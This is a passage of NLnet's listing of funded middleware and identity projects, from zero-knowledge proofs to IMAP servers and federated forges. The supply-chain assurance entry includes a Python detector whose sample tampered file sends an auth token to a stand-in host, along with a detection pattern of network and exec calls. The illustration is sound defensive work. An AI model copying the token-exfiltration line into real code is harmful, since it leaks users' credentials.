Middleware and identity

Middleware + identity, including DNS, authorisation, authentication, distribution/deployment, operations, reputation systems

This page contains a concise overview of projects funded by NLnet foundation that belong to Middleware and identity (see the thematic index). There is more information available on each of the projects listed on this page - all you need to do is click on the title or the link at the bottom of the section on each project to read more. If a description on this page is a bit technical and terse, don't despair — the dedicated page will have a more user-friendly description that should be intelligible for 'normal' people as well. If you cannot find a specific project you are looking for, please check the alphabetic index or just search for it (or search for a specific keyword).

0KNOW — Group Theoretic Zero-knowledge Proofs (0KNOW)

Zero-knowledge proof (ZKP) systems help principals verify the veracity of a piece of information without sharing the data. The overall goal of 0KNOW is to develop a lightweight group-theoretic zero-knowledge proof (GT-ZKP) system that can be employed as a cryptographic primitive in many security protocols such as identification, authentication, or credential ownership. They are widely used to preserve confidentiality and ownership of data. GT-ZKP can be seen as a reusable building block for making the future internet trustworthy and secure. In 0KNOW, we will focus on NP group-theoretic problems and design GT-ZKP by finding an appropriate platform group based on the selected difficult problem considering its applicability in the post-quantum era and we will develop an open-source implementation of GT-ZKP.

>> Read more about 0KNOW

Aerogramme — Standards-compliant open-source IMAP server with server-side encryption

Aerogramme is an open-source IMAP server targeted at distributed infrastructures and written in Rust. It is built on top of Garage, a (geographically) distributed object storage software. Aerogramme thus inherits Garage resiliency: its mailboxes are spread on multiple distant regions, regions can go offline while keeping mailboxes available, storage nodes can be added or removed on the fly, etc. Not only does it inherit its resiliency, but it also shares the burden of data management. Aerogramme can be seen as a proxy between the IMAP protocol and Garage protocols (S3 and K2V); it does not handle any data on its own and can be freely moved between machines. Multiple instances can also be run in parallel. As emails are very sensitive, Aerogramme encrypts users' mailboxes with their passwords. Data is decrypted in RAM upon user login: the Garage storage layer handles only encrypted blobs. Aerogramme is to our knowledge the first IMAP server to be designed from the ground up with object storage in mind. Thanks to this design, it is resilient and easy to scale.

>> Read more about Aerogramme

Automating mobile app interception with Frida — Mobile app network introspection for security research

Inspecting mobile app network traffic is a key part of security & privacy research, which helps protect everybody who uses modern mobile devices. It's also an indispensable debugging tool for app developers & QA teams. However, this technique has faced growing challenges from increasing OS restrictions and individual app countermeasures like certificate pinning, such that inspection now often requires advanced reverse-engineering knowledge and significant time-consuming manual setup. In this project, new tools will be built using Frida (a dynamic instrumentation framework) and integrated with HTTP Toolkit (a network debugging tool) to enable one-click targeted interception, making inspecting traffic from mobile apps on a user's own iOS & Android devices accessible to technical users without specialist expertise.

>> Read more about Automating mobile app interception with Frida

ARPA2 resource ACL and HTTP SASL modules for NGINX — Extend consistent access control to NGINX webserver

In most of our daily interactions with a remote server we depend on the application running on the server to properly authenticate the user within the browser session, and to manage who can do what. However, if we want to enforce stronger guarantees with regards to restricted resources and tasks, our options are much more limited. This project from the ARPA2 community wants to move the state of the art in access control forward by combining the extensible SASL standard with a well-defined generic ACL mechanism that also allows for pseudonymity. The project will produce a self-contained library and two modules for a popular web server (NGINX) that use the new library. With the NGINX HTTP SASL module a user-agent can authenticate to the web server using any SASL mechanism the server supports. With the NGINX ARPA2 ACL module the web server can determine whether an authenticated user has authorization for the request that he/she sent. For example, a user makes the request "DELETE /messages/10" and the server can then decide, based on the authenticated user, the action and the resource, whether this is allowed or not.

>> Read more about ARPA2 resource ACL and HTTP SASL modules for NGINX

Autocrypt for Thunderbird — Make email encryption extremely simple

Autocrypt is a specification that provides guidance for e-mail clients on how to achieve a seamless user experience. It does so by transparently exchanging keys, almost entirely automating public key management. This reduces the UI to "single click for encryption". The project will create an extension for the Thunderbird e-mail client that brings this experience to its users. The goal is to provide a new extension with a streamlined user experience that requires as little user interaction as possible, without "poweruser" features and performing practical user testing to identify open pain points. The extension will be based on OpenPGP.js, since this can be packaged directly. This will simplify installation and maintenance a great deal.

>> Read more about Autocrypt for Thunderbird

Back to source: trust but verify all the packages — Analysis pipeline for mapping and cross-referencing binaries with source code

Sometimes, the released binaries of an open source package do not match its source code. Or the source code does not match the code in a version control repo. There are many reasons for this discrepancy, but in all cases this is a potentially serious issue, as the binary cannot be trusted. Additional (or different) code in the binary could be malware or a vector for unknown software vulnerabilities, or create FOSS license compliance issues.

Back to source creates analysis pipelines to systematically map and cross-reference the binaries of a FOSS package to its source code and source repository and report discrepancies. We call this the deployment to development analysis (d2d) to map deployed code (binaries) to the development code (the sources) and plan to apply this "trust but verify" approach to all the binaries!

>> Read more about Back to source: trust but verify all the packages

Bitmask — User-friendly and secure VPN configuration

Bitmask is a Desktop and Android client designed to achieve a zero-configuration end-user experience for setting up a VPN that connects to a given set of providers - those that follow the LEAP platform specification. To do so, clients rely on providers exposing configuration files on well-known URLs, according to their particular setup regarding the available VPN gateways and transports. This project aims at adding low-end routers as a new platform that users can choose when installing BitmaskVPN. Running VPN software on a commonly available router, with hardware-based user interfaces, will greatly extend the target audience for Bitmask. To achieve this goal, the BitmaskVPN client will be ported to Nim, a statically typed language that generates small native and dependency-free executables, allowing the setup of the VPN with the flip of a hardware switch. Finally, the resulting port will be packaged for OpenWRT, and build scripts will be made available for providers to offer their users a ready-to-use flashing image for a selection of routers.

>> Read more about Bitmask

Bonfire Framework — Elixir-based ActivityPub implementation and library with groups and RBAC

Bonfire is an open-source, federated social networking toolkit, designed to empower communities to build custom and federated social networks. The current focus of our project is to improve the stability, performance, and documentation of our codebase, honing a solid framework that enhances user experience and encourages wider adoption. We aim to catch bugs, enhance platform performance, and enrich the developer experience by crafting comprehensive tutorials and documentation. A key aspect of our project involves extending our ActivityPub Library, which underpins the federated nature of Bonfire, and contributing back to the ActivityPub ecosystem by releasing v1.0 of our open-source ActivityPub library. The expected outcomes include a robust, efficient Bonfire framework to be used in production, a surge in developer and community adoption, and contributions to standardize federation protocols.

>> Read more about Bonfire Framework

Charon — Privacy-enabling account management and SSO solution

The overall goal of the Charon project is to build a privacy-enabling account management and SSO solution. For end-users, Charon will allow aggregating multiple existing authenticators (Facebook, Google, etc.) in one place and managing different (and potentially multiple) identities exposed to apps. Apps will not have to worry about user management. And admins of communities using those apps will be able to manage all users in one place, with tools to address abuse.

>> Read more about Charon

Cloud hosting service portability — Service portability for cloud hosting platforms

Configurious Monk or cMonk is a combination of a configuration portal and a set of deterministically configured services that can be used to provide ‘common internet services’ like DNS, E-mail, Matrix, Mastodon, Pixelfed, eduVPN, Nextcloud and more. cMonk's intended use is in large scale cloud deployments, intended for thousands or even millions of users. It is not intended for use in self-hosting situations, but might still be used that way.

The whole project is meant as a service platform for 'at scale' operations, so we are specifically aiming at 24x7x365 availability, which requires redundancy and automatic fail-overs everywhere. Configurious Monk is easy to use, and focuses on being ‘out of the way’ of the user. One of its key features is that it lets the user be in complete control. The ultimate form of control is that you can export all your data and configuration and take it elsewhere. Full service portability is the goal. It uses NixOS and the Nix package manager as its base and has an API that can be used to connect the configuration panel to other services.

>> Read more about Cloud hosting service portability

Coko Docs — A modern, open source replacement for Google Docs and Drive

Coko Docs is an open source solution for storing and editing documents using Coko’s publishing technologies. It is the first part of an Open Suite, which will be integrated with professional Open Publishing products. Coko Docs will have a modern collaborative environment for creating, sharing and hosting files in various formats. We aim to build inclusive tools as powerful as Google Drive and Docs; our initial target audience ranges from individuals to small organisations. Our primary goal is an Open Source product with strong Privacy and Security protocols and elegant accessible design. We will utilize the NLnet funding for the first phase of development, where we are adding collaborative editing to the integrated document editor, with offline support (for low-bandwidth scenarios).

>> Read more about Coko Docs

Connect by Name — Library for easy connection setup

Connect by Name will be a C library providing an interface that allows a software developer to set up internet connections from an application in the most private and secure manner using well-established and open standards. The interface provided to the software developer will be as simple as “Connect to a service on a domain name” and be flexible enough to fit with different programming paradigms and environments. The library will facilitate composability with other systems and will be extensible with future standards. Our goal is to lower the barrier for developing high-quality software and thereby improve the security and privacy of end users.

>> Read more about Connect by Name

Record Federation for Corteza Clouds — Data federation over ActivityPub

Corteza is a low code platform for building cloud-based web applications. This is typically for private, records-based management purposes (e.g. case management, insurance claims processing, public sector management applications, CRM, ERP), but the uses can also be public if required. It has a modular architecture and its data layer, presentation layer and automation layer can each be treated individually. Corteza Record Federation makes innovative use of the ActivityPub standard to describe how content from the Corteza data layer can be broadcast across large federations of Corteza clouds. All data types, simple or compound, entire records and entire data models are supported.

Whether it be energy, finance, health, education or smart cities, many industries need to share complex data in real-time or near real-time, while preserving the digital sovereignty of a large number of disparate actors, protecting the privacy of user data and acknowledging the law of whichever territories in which they find themselves operating. Corteza Record Federation allows for the creation of private networks of decentralised “mini-clouds”, all self-hosted and controlled by their owners, where this data exchange can happen as efficiently and more effectively than on any single centralised cloud.

>> Read more about Record Federation for Corteza Clouds

CryptoLyzer — Cryptographic settings analyzer library

CryptoLyzer is a cybersecurity tool that can analyze the cryptography-related settings of clients and servers in the case of several different protocols. The tool’s primary purpose is to support end users as well as system administrators, security engineers, auditors, etc., in their work by telling them the details of the currently applied setting and informing them about the potential weaknesses and vulnerabilities.

Unlike many other notable free software projects that focus on just one protocol family, CryptoLyzer wants to be as comprehensive as possible. On the one hand, users can analyze several cryptographic mechanisms (e.g., SSH, HTTP security headers, JA3 tag, and later OpenVPN), not just the most popular TLS protocol. On the other hand, it is possible to test both the standard and special or corner cases. The latter means the tool can test rarely supported, experimental, obsoleted, or even deprecated mechanisms or algorithms, which may carry significant risks. The project intends to learn from the existing projects and integrate their solutions to lower the barrier to good cryptographic settings, making communication on private and public networks more secure.

>> Read more about CryptoLyzer

CryptPad — Real-time collaboration with client-side encryption

Cryptpad is a secure and encrypted open source collaboration platform. The CryptPad teams project will fund the development of a number of group-focused features to Cryptpad. We'll improve our current implementation of encrypted shared folders to display the permissions possessed by team members for different documents. The capacity to remove a member from a group is difficult in an encrypted system, as the knowledge of encryption keys cannot be taken away once given. We'll implement key-rotation protocols, and develop encrypted mailboxes to facilitate the delivery of new keys to authorized members. The same mailbox system will enable the development of notifications, allowing users to request additional permissions for documents, to invite new members to a group or session, or to inform friends that a document has been updated. Teams organize in many ways, and with the technical components available we'll focus on interfaces which support different modes of coordination, whether the team is hierarchical or self-organizing. Overall, we hope to make it so that the most intuitive way to collaborate is also the most secure.

>> Read more about CryptPad

CryptPad Auth — Implement external identity mechanisms to E2EE collaborative editor

CryptPad is a real-time collaboration environment that encrypts all user-generated content in users' browsers, making it illegible to the host of the service. In this project we'll develop optional extensions to the platform to provide additional layers of protection for such data by pursuing two broad strategies in parallel. For the first, we'll take a top-down approach to security through integration with identity provider services like LDAP or SSO, allowing organizations to apply centrally managed access control policies. For the second, more bottom-up approach, we'll offer tighter control of user accounts through various secondary authentication methods like app-based TOTP or email "magic-links". These new features will provide more choices for the protection of data stored in CryptPad, while also making the platform more approachable for conventional organizations by leveraging their existing points of trusted infrastructure.

>> Read more about CryptPad Auth

CryptPad Blueprints — Server-side encrypted collaborative editor

CryptPad is an end-to-end encrypted collaboration suite that has been under active development for 8 years, and is currently used by hundreds of thousands of people. Its feature set has grown from a simple editor to a full-blown suite with multiple apps, drive, teams, etc. The next generation of CryptPad should be even better - with stronger security guarantees ("perfect forward secrecy", post-quantum crypto), offline-first collaborative editing, and user-driven workflows like password resets. This project will take the first steps in this direction. We document the ways in which cryptography is used on the platform, review the state of the art in applied cryptography and then evaluate the right match with available technologies. Finally we will use these foundations to move forward to a new architecture for CryptPad that will allow for future developments, improved usability, and tighter security.

>> Read more about CryptPad Blueprints

GNU Guix - Cuirass — Continuous integration system for GNU Guix/Linux + Hurd

GNU Guix is a universal functional package manager and operating system which respects the freedom of computer users. The number of supported packages, almost 15.000 on 5 different architectures, is constantly increasing. With the recent efforts adding support for the GNU Hurd operating system, and the ongoing work to easily provide Guix System images for various boards, the need for a strong continuous integration system is critical.

This project aims to improve Cuirass, the GNU Guix continuous integration software, to provide binary substitutes for every package or system image within the shortest time. This way, the user won't have to allocate significant time and computing resources to package building. The plan is to add to Cuirass an efficient offloading and work-balancing mechanism between build machines, and an improved web interface allowing users to monitor machine loads and other build-related metrics. A user account section to set up customized monitoring dashboards and subscribe to build failure notifications will also be developed.

>> Read more about GNU Guix - Cuirass

Anonymisation for Data Donations — Facilitate platform scrutinization through anonymised data contributions

Recommendation systems are gatekeepers of online content. Despite their huge influence, these systems are opaque and unaccountable. Thanks to user data donations (e.g. users sharing their personal recommendations), researchers are able to scrutinize algorithms from the outside, even in the absence of official APIs.

Because recommendations are personalised and thus can expose sensitive information, it is essential to guarantee the privacy of our data donors. The project will design and implement a private-by-design data donation infrastructure. With such a scheme, contributions do not have any form of user identification in the database. They are indexed by a cryptographic token, generated from a user-owned secret key. This ensures that there is no visible link between a contribution and a user, or between two contributions from the same user, even with full access to the database.

Users can re-generate the indexes of their contributions using their secret key, allowing them to retrieve or delete their data in part or whole, as required by the GDPR. This project will not only be a major enabler for broader platform scrutinization, but also a reusable building block for other projects that need to collect sensitive data with strong privacy guarantees.

>> Read more about Anonymisation for Data Donations

Securing Internet protocols with DIDs — Bridge Decentralized Identifiers with standardised authorisation mechanisms

Many Internet protocols require authentication, e.g. when we check our email account with a username and password, when we authenticate to SSH hosts with public keys, or when we log in to websites using OpenID Connect.

Decentralized Identifiers (DIDs) are a new type of identifier that have associated private keys and can be used for authentication purposes. DIDs are in practice mostly used for exchanging Verifiable Credentials (VCs) between Issuers, Holders, and Verifiers. However, on a more basic level, DIDs can also simply be used as a replacement for usernames/passwords or static public keys, to authenticate by proving control over one's DID. Unlike other identifiers such as usernames or domain names, DIDs do not require a central authority for creating and using them.

In this project, we will work on integrating DIDs with existing Internet protocols that require authentication by developing a new SASL mechanism. The idea is that for example you could log in to your SSH host, email account, IRC server, XMPP server, etc. using your DID, which can improve both usability and security.

>> Read more about Securing Internet protocols with DIDs

Distributed Mechanism Learning — Privacy preserving ways of distributed data usage

Mechanism design is a field concerned with finding rules for economic processes which incentivize self-interested agents to behave in a way such that a common goal is reached. This project aims to build robust infrastructure for mechanism design via machine learning, to make theoretical results more applicable to practical networked deployments. We plan to do this by finding solutions for the following two problems and making them accessible to developers, while keeping the required domain knowledge to a minimum:

On the one hand, a trusted third party is often assumed to exist, which is supposed to learn and execute the mechanism. In practice, finding neutral trusted parties who do not stand to gain anything from cheating can be hard. To solve this problem, we distribute the computation of the trusted party over multiple computers, ideally controlled by different entities, using multiparty computation. This way, we get a more robust trust base with better alignment of incentives.

On the other hand, current models often assume prior knowledge about preference distributions of agents to learn optimal mechanisms. In practice, this knowledge is not always available. We exchange finding optimal solutions using prior information with finding approximate solutions using no prior information, by way of differentially private learning. This results in more general applicability, especially in settings with sparse information.

>> Read more about Distributed Mechanism Learning

Distributed Private Trust — Decentralised trust and reputation system

The project "Distributed Private Trust" wants to develop a prototype for a trust and reputation system that does not rely on a centralized trusted party and provides users with more privacy than current systems. It uses secure multi-party computation to calculate aggregate ratings without having to reveal individual users' ratings to any other party. The project also applies techniques from mechanism design to make the system robust to malicious behaviour of participants, for example by diminishing incentives to submit dishonest ratings.

>> Read more about Distributed Private Trust

django-allauth — Versatile authentication for Django

The goal of django-allauth is to offer a free, secure, well integrated, reusable authentication solution for the Django framework, covering all functionality related to local and social user accounts, multi-factor authentication, in various configurations, with flows that just work. By simplifying the complexities associated with user authentication, django-allauth empowers Django developers of all kinds to focus on building their web applications without compromising on the authentication features provided to their end users.

>> Read more about django-allauth

DNSvizor — Privacy-enhanced DNS resolver and DHCP server

A secure and robust DHCP server and DNS resolver with a small resource footprint. We will develop a MirageOS unikernel providing these crucial network services. There are various privacy extensions (such as query name minimisation, and recently published opportunistic encryption between the resolver and the authoritative name server), as well as the possibility to deny resolution of configurable domain names (block lists). For enhanced security, we will implement DNSSEC. We will provide DNS-over-TLS and DNS-over-HTTPS services. This will be a drop-in replacement for DNSvizor and Pi-hole.

The project builds on top of MirageOS: a library operating system developed in OCaml — a memory-safe functional programming language. In MirageOS, each service is a separate unikernel with a minimal attack surface that only contains the code required to run it. These unikernels are normally executed as a virtual machine on platforms such as KVM, VirtIO or Xen. MirageOS also supports using a strict security feature of the Linux kernel called seccomp.

>> Read more about DNSvizor

Dolphin authorisation — Avoid privilege escalation in the Dolphin file manager

While acting with elevated privileges, software needs to be distraction-free, clear and user-friendly to avoid security issues and other ways of impairing a system. This project is about enabling average users to do administrative file manipulation within the popular file manager Dolphin securely and with confidence. There is a strong demand for proper integration, enabling less technically-savvy users to safely work with all kinds of files. This project will bring improvements to technical and user-friendliness aspects, so the user will know how to securely accomplish their tasks. This will remove some attack vectors, reduce the risk of falling for social engineering, and reduce user error.

>> Read more about Dolphin authorisation

dream2nix — Automate reproducible packaging for various language ecosystems

Dream2nix is part of the overall effort to create more technical assurances, transparency and robustness within the software supply chain. Dream2nix as a framework allows more open source projects to achieve reproducible builds more easily, and helps to create an auditable toolchain across different technical dependencies. The ability to reproduce software builds is of major importance when it comes to verifying whether a given binary is the product of a given source code. Reproducibility also increases the maintainability and reliability of small and large software deployments. The nix build system allows for such reproducibility even for complex software systems. dream2nix integrates existing well-known programming-language-specific package managers like npm, yarn or cargo with the nix build system, which will allow many open source projects to benefit from nix's unique properties.

>> Read more about dream2nix

Python supply-chain with dream2nix — Towards a secure, extensible & reproducible Python supply-chain with dream2nix

We aim to improve the software supply chain of Python with Nix by extending Dream2nix. While the Nix build system offers great reproducibility and auditability features, the effort required to manually write build expressions for all transitive dependencies has led to the creation of various "lang2nix" tools. Dream2nix is a collection of such tools and a library handling shared concerns, with existing implementations for NodeJS, Rust and Haskell. This project is going to implement first-class Python support in dream2nix. Packagers and developers will be able to build standards-compliant projects with nix automatically, while still being able to transparently apply patches where necessary.

>> Read more about Python supply-chain with dream2nix

EGIL SCIM client — System for Cross-domain Identity Management

Managing student information in an effective, secure and GDPR-compliant way is crucial for the digitalized school. EGIL is an open source client that facilitates the exchange of student information to external providers of study material or administrative services in a standardized way. It supports attributes based on SCIM (RFC 7642-7644) and extensions, it provides an interface to common directory services and supports federated solutions between a large number of school principals and service providers. This project will improve EGIL's federative capabilities, submit an Internet-Draft on the subject of federated account provisioning, and provide a proof of concept for using SCIM as the standard for exchange of student information. This will eliminate the problems caused by using several different exchange protocols and formats between school principals and service providers.

>> Read more about EGIL SCIM client

The search for ethical Apps — Create custom, self-hostable app stores for Android(-like) OS-es

Once you own a smartphone, often you will want to install additional apps to add additional functionality. In some cases there isn't much choice, like when you as a citizen need to use digital services provided by your government and these are exclusively available through apps. Pre-configured vendor app stores such as the Google Play store and the Apple App store actually require you to agree to privacy-unfriendly terms of service and introduce tracking behaviour - even if you are only going to be installing ethical apps that themselves are open source and privacy-friendly. On top of that, these app "warehouses" contain a confusing amount of lookalike and dishonest applications that take advantage of naive consumers. Sending users into an app jungle with hundreds of thousands of apps that often resemble each other leaves users unprotected. In fact, in many cases the whole idea of a "store" doesn't make sense - like when an app is paid for by public funding.

So why not create alternative mechanisms that give easy and convenient access to apps and do not force citizens to sign contracts with commercial third parties? This project will create custom app distribution mechanisms based on F-Droid, allowing anyone to curate a set of applications and distribute these to users directly - without them having to sign away any rights to third parties.

>> Read more about The search for ethical Apps

Federated software forges with Forgejo — Add ActivityPub based federation to Forgejo

Forgejo is a self-hosted software forge where developers can work together on software projects and users can report bugs or request features. As of Forgejo version 1.20, when a project is hosted on a Forgejo instance, every developer is expected to create an account on that instance in order to participate. Compared to email, it is as if it was necessary to create an account on gmail.com to send a message to someone with an @gmail.com email address and another on yahoo.fr to send a message to someone with an @yahoo.fr email address. But in 2022 there are two protocols that can change this: the W3C ActivityPub protocol published in 2017 and forgefed, an emerging standard (since 2019) to describe activities happening on software forges. They can be used by Forgejo instances to communicate with each other and create a federation of forges continuously communicating with one another instead of a constellation of isolated silos. A federated Forgejo will enable software developers to work on the same project even when they use different Forgejo instances. There will be bridges between isolated Forgejo instances that software projects can use to synchronize in real time.

>> Read more about Federated software forges with Forgejo

ForgeFed — Federating software forges with ActivityPub

The platforms that software developers use for hosting and collaborating on their projects, known as software forges, are centralized systems. Some of the most popular forge websites run proprietary software and are controlled by a single company. The values, methods, policies and interfaces of the tools we use for our software projects often don't align with our values and needs, but despite having coding skills, we're powerless to change the situation. ForgeFed aims to put the power back into the hands of the Free Software community, and to allow for systems that are truly trustworthy and support inclusion, freedom, participation, censorship resistance and alignment with needs, by turning software forges into a decentralized network. ForgeFed is a protocol and vocabulary for federation of servers and services related to the Software Development Lifecycle, and an attempt to implement federation in existing free-software forges. ForgeFed is based on the ActivityPub protocol, which is widely adopted on the Fediverse, and augments it with Object Capabilities, an essential component for distributed, secure and flexible authorization of access to collaborative resources.

>> Read more about ForgeFed

FOSS Code Supply Chain Assurance — Mitigate attacks through software dependencies

It is of the utmost importance to ensure that FOSS packages from public repositories have not been tampered with by malicious actors. This type of compromise is described as an open source "supply chain attack", and such attacks have been increasing significantly. This project is building a new system (which is FOSS itself) to help verify the integrity of deployed code packages and validate their origin against external data sources, with the potential to mitigate attacks on the open source package supply chain. Examples are detecting whether a package in use matches verified code, by matching source and binaries exactly or approximately, and detecting abnormal code changes that may be signs of malicious modification of a package.

The key components of this open code and data solution are a Package and File Fingerprints Database, a Code Similarity and Changes Detection Engine, utilities to detect possibly malicious changes in upstream projects, and integration in build system(s). While existing approaches may require a tight control of the whole code supply chain, the approach of this project is designed for practical usage with limited changes to a build and CI/CD pipeline.

>> Read more about FOSS Code Supply Chain Assurance

FOSS Code Supply Chain Assurance II — Add approximate matching capabilities to software vulnerability discovery

It is of the utmost importance to ensure that FOSS packages from public repositories have not been tampered with by malicious actors. This type of compromise is described as an open source "supply chain attack", and such attacks have been increasing significantly. This project is building a new system (which is FOSS itself) to help verify the integrity of deployed code packages and validate their origin against external data sources, with the potential to mitigate attacks on the open source package supply chain. Examples are detecting whether a package in use matches verified code, by matching source and binaries exactly or approximately, and detecting abnormal code changes that may be signs of malicious modification of a package.

The key components of this open code and data solution are a Package and File Fingerprints Database, a Code Similarity and Changes Detection Engine, utilities to detect possibly malicious changes in upstream projects, and integration in build system(s). While existing approaches may require a tight control of the whole code supply chain, the approach of this project is designed for practical usage with limited changes to a build and CI/CD pipeline.

This is the second phase of this ambitious project. Its focus is to enable approximate matching between a database of FOSS package resources and an actual FOSS package or other code. Moreover, various architectural improvements will be made to support use at a larger scale.
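The two phases above describe the same pipeline: fingerprint files in a package, match them against a database of verified upstream files exactly and then approximately, and flag the changes that survive as possibly malicious. The following is an added illustration of that pipeline and is not the project's own code or database format. It keeps everything in memory, uses SHA-256 over raw and comment-and-whitespace-stripped contents as the exact and approximate fingerprints, difflib for similarity, and a deliberately crude regular expression as the "abnormal change" heuristic; the two package snapshots are constructed samples.

```python
import difflib
import hashlib
import re
from dataclasses import dataclass, field

# Constructed sample: the verified upstream contents of a package, keyed by
# path, standing in for the fingerprint database of known-good files.
VERIFIED_PACKAGE = {
    "pkg/__init__.py": "from .auth import check_token\n",
    "pkg/auth.py": (
        "import hmac\n"
        "\n"
        "def check_token(expected, supplied):\n"
        "    # constant-time compare\n"
        "    return hmac.compare_digest(expected, supplied)\n"
    ),
}

# Constructed sample: the copy found in a deployment. __init__.py only gained a
# build comment; auth.py gained an import and a call that ships the token
# elsewhere, the kind of change a supply-chain compromise introduces.
DEPLOYED_PACKAGE = {
    "pkg/__init__.py": "# built by CI\nfrom .auth import check_token\n",
    "pkg/auth.py": (
        "import hmac\n"
        "import urllib.request\n"
        "\n"
        "def check_token(expected, supplied):\n"
        "    urllib.request.urlopen('http://collector.invalid/?t=' + supplied)\n"
        "    # constant-time compare\n"
        "    return hmac.compare_digest(expected, supplied)\n"
    ),
}


def exact_fingerprint(text):
    """SHA-256 of the raw bytes: any change at all, even whitespace, alters it."""
    return hashlib.sha256(text.encode()).hexdigest()


# Crude normaliser: strip comments and all whitespace before hashing, so that
# cosmetic build-time edits still match. A real tool would tokenise instead.
_NOISE = re.compile(r"#.*$|\s+", re.MULTILINE)


def normalized_fingerprint(text):
    return hashlib.sha256(_NOISE.sub("", text).encode()).hexdigest()


# Heuristic for "abnormal" additions: new imports, or calls that reach the
# network, spawn processes, or decode/execute data. Tune per ecosystem.
_SUSPICIOUS = re.compile(r"\b(import|urllib|socket|requests|subprocess|eval|exec|base64)\b")


@dataclass
class Finding:
    path: str
    status: str                 # exact | approximate | modified | missing | unexpected
    similarity: float           # line-level difflib ratio; 1.0 for exact/approximate
    added_lines: list = field(default_factory=list)

    @property
    def suspicious(self):
        return self.status in ("modified", "unexpected") and any(
            _SUSPICIOUS.search(line) for line in self.added_lines)


def compare_file(path, verified, deployed):
    if exact_fingerprint(verified) == exact_fingerprint(deployed):
        return Finding(path, "exact", 1.0)
    if normalized_fingerprint(verified) == normalized_fingerprint(deployed):
        return Finding(path, "approximate", 1.0)
    good, actual = verified.splitlines(), deployed.splitlines()
    sm = difflib.SequenceMatcher(None, good, actual)
    added = [actual[j] for tag, _, _, j1, j2 in sm.get_opcodes()
             if tag in ("insert", "replace") for j in range(j1, j2)]
    return Finding(path, "modified", sm.ratio(), added)


def compare_package(verified, deployed):
    findings = []
    for path in sorted(set(verified) | set(deployed)):
        if path not in deployed:
            findings.append(Finding(path, "missing", 0.0))
        elif path not in verified:
            findings.append(Finding(path, "unexpected", 0.0, deployed[path].splitlines()))
        else:
            findings.append(compare_file(path, verified[path], deployed[path]))
    return findings


def suspicious_paths(findings):
    return [f.path for f in findings if f.suspicious]


if __name__ == "__main__":
    for f in compare_package(VERIFIED_PACKAGE, DEPLOYED_PACKAGE):
        flag = " SUSPICIOUS" if f.suspicious else ""
        print(f"{f.path}: {f.status} (similarity {f.similarity:.2f}){flag}")
        for line in f.added_lines:
            print("   +", line)
```

On the sample, `pkg/__init__.py` is reported as an approximate match (only a comment was added) while `pkg/auth.py` is reported as modified with the two inserted lines listed and flagged. The exact/approximate split is what lets a check like this run against rebuilt or repackaged artifacts without a tightly controlled pipeline; the heuristic stage is where false positives come from, so in practice its hits are reviewed rather than blocked on automatically.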

>> Read more about FOSS Code Supply Chain Assurance II

Garage — Lightweight geo-distributed data store compatible with Amazon S3

Garage is a lightweight geo-distributed data store that implements the Amazon S3 object storage protocol. Garage is meant primarily for self-hosting at home on second-hand commodity hardware, meaning it has to tolerate a wide variety of failure scenarios such as power cuts, Internet disconnections, and machine crashes or slow response times. It also has to be easy to deploy and maintain, so that hobbyists and small organizations can use it without a hassle. Garage focuses on allowing users to build geo-distributed clusters, with nodes connected through consumer-grade Wide Area Network (Internet) connections. Garage makes this possible by tolerating relatively high latency between nodes thanks to an innovative design based on the principles of the Dynamo database and that makes heavy use of Conflict-free Replicated Data Types (CRDTs). Garage is written in Rust, with a strong emphasis on stability and robustness. The funding from NLnet will allow development of Garage to continue, tackling in particular the following two aspects: improving compatibility with the S3 protocol and guaranteeing the stability and soundness of the core of Garage's storage engine.

>> Read more about Garage

Garage Administration UI — Easier administration for selfhosted storage buckets

Garage is a lightweight geo-distributed data store that implements the Amazon S3 object storage protocol. Garage is meant primarily for self-hosting at home on second-hand commodity hardware, and aims to be easy to deploy and maintain, so that hobbyists and small organizations can use it without a hassle. To further this goal, the Garage admin interface project aims to develop a web UI to make cluster administration easier and more intuitive. This interface will cover the most common operations on a Garage cluster: visualizing cluster status; joining new nodes, removing nodes, and changing node configuration; and management of S3 access keys, buckets and bucket configurations.

>> Read more about Garage Administration UI

GNU Name System — Authenticated naming system for the internet from GNU project

Today, the starting point of any discovery on the Internet is the Domain Name System (DNS). DNS suffers from security and privacy issues. The GNU project has developed the GNU Name System (GNS), a fully decentralized, privacy-preserving and end-to-end authenticated name resolution protocol. In this project, we will document the protocol on a bit-level (RFC-style) and create a second independent implementation against the specification. Furthermore, we will simplify the installation by providing proper packages that, when installed, automatically integrate the GNS logic into the operating system.

>> Read more about GNU Name System

GNS Migration and Zone Management — Registrar tools for adoption of GNU Name System

The GNU Name System is in the final stages of standardization. Consequently, calls for migration and large-scale testing as well as interest in running GNS registrars are increasing. In order to address this development this project aims to facilitate the management of GNS zones by administrators and to provide users with means to resolve real-world names.

To ease adoption, a framework for GNS registrars will be developed for zone management. The registrar framework will allow GNS zone administrators to provide a web interface for subdomain registration by other users. The services may also be provided for a fee, similar to how DNS domain registrars operate, to cover running costs. The framework is envisioned to support integration of privacy-friendly payments with GNU Taler (https://www.taler.net).

To demonstrate the capabilities of GNS with respect to DNS migration, we plan to run multiple GNS zones ourselves which contain the zone information from real-world DNS top-level domains. A selection of existing top-level domains for which open data exists will be hosted and served through GNS in order to facilitate daily use of the name system. We are planning to integrate at least three DNS zones and publish them (regularly) in GNS for users to resolve.

>> Read more about GNS Migration and Zone Management

GNU Taler KYC — Know-Your-Customer support for GNU Taler

This work is about adding proper Know-Your-Customer (KYC) support to GNU Taler to satisfy regulatory requirements to operate the Taler payment service. However, we will not implement our own KYC solution but instead provide a generic way to interface with existing KYC providers and implement several concrete adapters. By supporting multiple providers we will ensure that our KYC abstraction is reasonably generic.

The KYC integration will be configurable to adjust the deployment to the legal requirements of different countries. Finally, we will support attestation of collected KYC information to third parties. This will allow the payment system to assure consumers receiving a bill about the identity of the invoicing business.

>> Read more about GNU Taler KYC

Nix Integration for Hop3 — Nixify the Hop3 self-hosted cloud platform

Hop3 is an open-source orchestration platform designed to simplify the deployment and management of distributed applications across cloud and edge environments. With a focus on flexibility, security, resilience, and ease of use, Hop3 empowers developers and small organisations to take full control of their IT infrastructure and data, ensuring digital sovereignty and avoiding vendor lock-in. The project will enhance the Hop3 platform by integrating Nix, a powerful package manager known for its ability to create reproducible environments, to improve build-time flexibility and ensure consistent, reliable run-time performance. As a test bed and showcase of this integration, we will package 20 diverse and impactful F/OSS applications. Additionally, we will develop new resilience and cybersecurity features to further strengthen the platform's robustness and security.

>> Read more about Nix Integration for Hop3

A proof of concept of identity-based encryption — Make encryption simpler

